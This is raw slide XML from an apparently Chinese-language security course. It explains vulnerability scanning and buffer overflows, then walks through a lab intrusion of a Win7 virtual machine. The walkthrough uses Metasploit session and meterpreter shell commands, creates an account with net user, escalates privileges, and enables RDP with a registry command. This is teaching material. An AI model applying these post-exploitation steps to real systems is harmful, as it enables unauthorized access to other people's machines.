                    <a:pt x="522" y="283"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="491" y="240"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="663" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491" y="240"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="272" y="362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544" y="362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">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path>
                <a:path w="889" h="1065">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path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4101560" y="3029353"/>
            <a:ext cx="3233733" cy="467043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="33052" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>漏洞库更新关键</a:t>
            </a:r>
            <a:endPar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322378" y="3496396"/>
            <a:ext cx="2792098" cy="2261799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="33052" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188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基于漏洞库的扫描采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>规则匹配技术</a:t>
            </a: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；漏洞库由安全专家测试、黑客案例分析和系统管理员经验构建，需定期修订更新以确保有效性。</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961365" y="3029353"/>
            <a:ext cx="3233733" cy="467043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="33052" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>缓冲区溢出历史</a:t>
            </a:r>
            <a:endPar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142813" y="3505286"/>
            <a:ext cx="2792098" cy="2261799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="33052" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a: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攻击始于20世纪80年代，Morris蠕虫事件虽引发感染，但未受足够重视；据统计，此类攻击占系统攻击总数的80%以上。</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7335294" y="3029353"/>
            <a:ext cx="3233733" cy="467043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="33052" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>口令安全警示</a:t>
            </a:r>
            <a:endPar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7556111" y="3496396"/>
            <a:ext cx="2792098" cy="2261799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="66008" tIns="33052" rIns="66008" bIns="33052" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="188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当口令使用简单的数字和字母组合时，非常容易被破解，我们称这种口令为弱口令，弱口令容易被破解，因此设置复杂密码至关重要。</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990600" y="1600200"/>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7）获取shell</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371600" y="2133600"/>
            <a:ext cx="9241790" cy="1014730"/>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如图你在kali上会有一个session。你攻陷了别人的主机并拿到了shell，还有session信息，如图5-35所示。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0600" y="3352800"/>
            <a:ext cx="6553200" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>msf exploit(handler) &gt; sessions</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>msf exploit(handler) &gt; sessions -i 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>meterpreter &gt; shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="图片 35" descr="image"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="3124200"/>
            <a:ext cx="6268085" cy="2080895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="5205095"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-35 获取shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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219200" y="1732915"/>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7）获取shell</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2176780"/>
            <a:ext cx="10300335" cy="1014730"/>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Meterpreter就是metasploit框架中的一个扩展模块，一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道：cn_win7_x86_7601虚拟机，如图5-36所示。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810000" y="4648200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-36 获取shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="图片 36" descr="image (1)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3200400"/>
            <a:ext cx="5213350" cy="1377950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276350" y="5086350"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就这样成功入侵了win7系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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1295400" y="1676400"/>
            <a:ext cx="467804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8）利用漏洞创建普通账号l</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2176780"/>
            <a:ext cx="10300335" cy="1014730"/>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现在我们获取得到目标系统的访问权限，可以通过net user命令创建限制权限的普通账号，如图5-37所示。在win7的目标及上输入下面的命令：</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810000" y="4648200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-37 通过net user命令创建限制权限的普通账号l</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="图片 37" descr="image (3)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3279140"/>
            <a:ext cx="5509260" cy="1299210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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95400" y="1676400"/>
            <a:ext cx="10300335" cy="1476375"/>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9）权限提升</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如果在这个过程中采取的是受限制的账号进入的话，将会被限制执行需要管理员账号权限的一些命令，对账号进行提权可以克服这类问题，如图5-38所示。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40" name="图片 38" descr="image (4)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="3200400"/>
            <a:ext cx="5107305" cy="1191895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="4572000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-38 为普通账号提升管理员权限</a:t>
            </a:r>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95400" y="1676400"/>
            <a:ext cx="10300335" cy="1014730"/>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10）远程桌面验证</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（1）接下来执行命令 netstat -an 看一下目标主机开放端口的情况，如图5-39所示。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3" name="图片 39" descr="image (5)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2743200"/>
            <a:ext cx="3969385" cy="2870200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="5791200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-39 查看目标主机端口开放情况</a:t>
            </a:r>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95400" y="1676400"/>
            <a:ext cx="10300335" cy="3784600"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10）远程桌面验证</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发现并没有开启3389（远程桌面连接端口），先找到计算机右键属性，然后手动开启3389端口，如图5-40所示。</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2" name="图片 40" descr="image (7)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3200400"/>
            <a:ext cx="4533265" cy="2869565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="6172200"/>
            <a:ext cx="6096000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="华文宋体" panose="02010600040101010101" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" charset="-122"/>
                <a:cs typeface="华文宋体" panose="02010600040101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图5-40 手动开启3389端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="华文宋体" panose="02010600040101010101" charset="-122"/>
              <a:ea typeface="华文宋体" panose="02010600040101010101" charset="-122"/>
              <a:cs typeface="华文宋体" panose="02010600040101010101" charset="-122"/>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676400"/>
            <a:ext cx="10300335" cy="1014730"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>10）远程桌面验证</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（2）接下来在kali中输入命令查看端口开放情况，如图5-41所示。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0" name="图片 41" descr="image (8)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="2743200"/>
            <a:ext cx="4490085" cy="3430905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153400" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-41 查看端口开放情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815340" y="3048000"/>
            <a:ext cx="5721985" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>也可以执行命令：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</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676400"/>
            <a:ext cx="10718165" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）远程桌面验证</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）打开win 7虚拟主机，确保网络连通性，打开远程桌面连接。测试连通性如图5-42所示。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49" name="图片 42" descr="image (9)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="2819400"/>
            <a:ext cx="4183380" cy="2636520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5715000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-42 测试网络连通性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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676400"/>
            <a:ext cx="10718165" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）远程桌面验证</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打开远程桌面进行连接，如图5-43所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="图片 43" descr="image (10)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2667000"/>
            <a:ext cx="3951605" cy="3656965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="6400800"/>
            <a:ext cx="2322830" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-43 进行远程连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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676400"/>
            <a:ext cx="10718165" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>）远程桌面验证</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远程桌面连接10.10.10.132，如图5-44所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="图片 44" descr="image (11)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
